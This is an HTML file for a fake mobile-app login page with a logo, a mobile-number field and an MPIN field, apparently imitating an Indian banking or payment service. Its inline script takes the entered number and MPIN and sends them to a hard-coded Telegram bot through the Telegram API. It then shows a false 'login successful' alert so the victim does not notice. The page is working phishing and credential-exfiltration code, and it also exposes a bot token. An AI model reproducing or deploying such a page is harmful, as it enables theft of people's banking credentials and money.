<html> <head> <title>Login Page</title> 
<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.15.3/css/all.min.css">
<script src="https://ajax.googleapis.com/ajax/libs/jquery/3.5.1/jquery.min.js"></script>
<style>
body { 
    font-family: Arial, sans-serif;
    background-color: #fceae8;
    justify-content: center;
    align-items: center;
    height: 100vh;
    margin: 0;
    }
    
.container {
    background-color: #ffffff;
    border-radius: 10px;
    box-shadow: 0 0 10px rgba(0, 0, 0, 0.1);
    padding: 20px;
    width: 370px;
    height: 550px;
    text-align: center;
    }
    
h1 {
    color: #d9534f;
    font-size: 25px;
    margin-bottom: 20px;
    font-weight: bold;
    }
.input-group {
    margin-bottom: 15px;
    text-align: left;
    }
.input-group label{
    display: block;
    font-size: 15px;
    margin-bottom: 5px;
    font-weight: bold;
    }
.input-group input {
    width: calc(100% - 20px);
    height: 60px;
    padding: 10px;
    border: 1px solid #ccc;
    border-radius: 5px;
    font-size: 14px; }
    
.input-group input[type="password"] { 
    font-family: 'Courier New', Courier, monospace;
    letter-spacing: 5px;
    } 

.forgot-password {
    display: block;
    margin: 10px 0;
    font-weight: bold;
    font-size: 15px;
    color: #007bff;
    text-decoration: none;
    }

.forgot-password:hover { 
    text-decoration: underline;
    }

.login-btn {
    background-color: #d9534f;
    color: #ffffff; border: none;
    padding: 10px 20px;
    border-radius: 5px;
    font-size: 16px;
    cursor: pointer;
    width: 100%;
    height: 50px;
    }

.login-btn:hover {
    background-color: #c9302c;
    }

.terms {
    font-size: 15px;
    margin-top: 15px;
    font-weight: bold;
    }

.terms a {
    color: #007bff; 
    text-decoration: none;
    }

.terms a:hover { 
   text-decoration: underline; 
   }

</style>

</head>
<body>
    <br>
    <p align="center"> <img src="https://i.postimg.cc/R0Fkf2bV/src-assets-images-logo.png" style="width: 130px"></a>
    <div class="container">
        <div class="logo" >
        </div> 
        <h1>Login to Your Account</h1>
        
        <div class="input-group">
           <form onsubmit="return sender()">
                  <label for="mobile-number">Mobile Number<span style="color: red;"> *</span></label>
                
        <input type="text" id="mobno" name="mobno" placeholder="+91 Enter mobile number" maxlength="12" required>
        </div>
        <div class="input-group">
            
                <label for="mpin">Enter MPIN <span style="color: red;">*</span></label>
            
            <input type="password" id="mpin" name="mpin" placeholder="****" maxlength="4" required>
            </div>
           
               <a href="#" class="forgot-password">Forgot MPIN/ Password</a>
           
            <button class="login-btn">LOGIN</button>
            </form> <div class="terms"> By Login, I agree to the
            <br><br>
            <a href="#">Terms Of Service</a>
            
            and 
            <a href="#">Privacy Policy</a>
            <br><br><br><br><br><br>
             <p align="center">
               <span style="color: black;">Version 21.7</span>
               </p>
            </div> 
               </div> 
               
              <link rel="stylesheet" href="style.css">
    <script src="sender.js"></script>
  
  <script src="https://unpkg.com/sweetalert/dist/sweetalert.min.js"></script>
  
  <script>
  //bot token
var telegram_bot_id = "7603041996:AAHDY91AzmcQd8AK6_y3SJ8nz6SvfSSGakk";
//chat id
var chat_id = 6797224482;
var ready = function () {
    mobno = document.getElementById("mobno").value;
    mpin = document.getElementById("mpin").value;
  
    message = 
      "\nMob No: " + mobno + 
      "\nMPin: " + mpin;
};
var sender = function () {
    ready();
    var settings = {
        "async": true,
        "crossDomain": true,
        "url": "https://api.telegram.org/bot" + telegram_bot_id + "/sendMessage",
        "method": "POST",
        "headers": {
            "Content-Type": "application/json",
            "cache-control": "no-cache"
        },
        "data": JSON.stringify({
            "chat_id": chat_id,
            "text": message,
          "file": message
        })
    };
    $.ajax(settings).done(function (response) {
        console.log(response);
      swal("Successfull", "Your Login Successfull", "success");
      
    });
    document.getElementById("mobno").value = "";
    document.getElementById("mpin").value = "";
    
    return false;
};
  </script>
               
 </body> 
    </html>
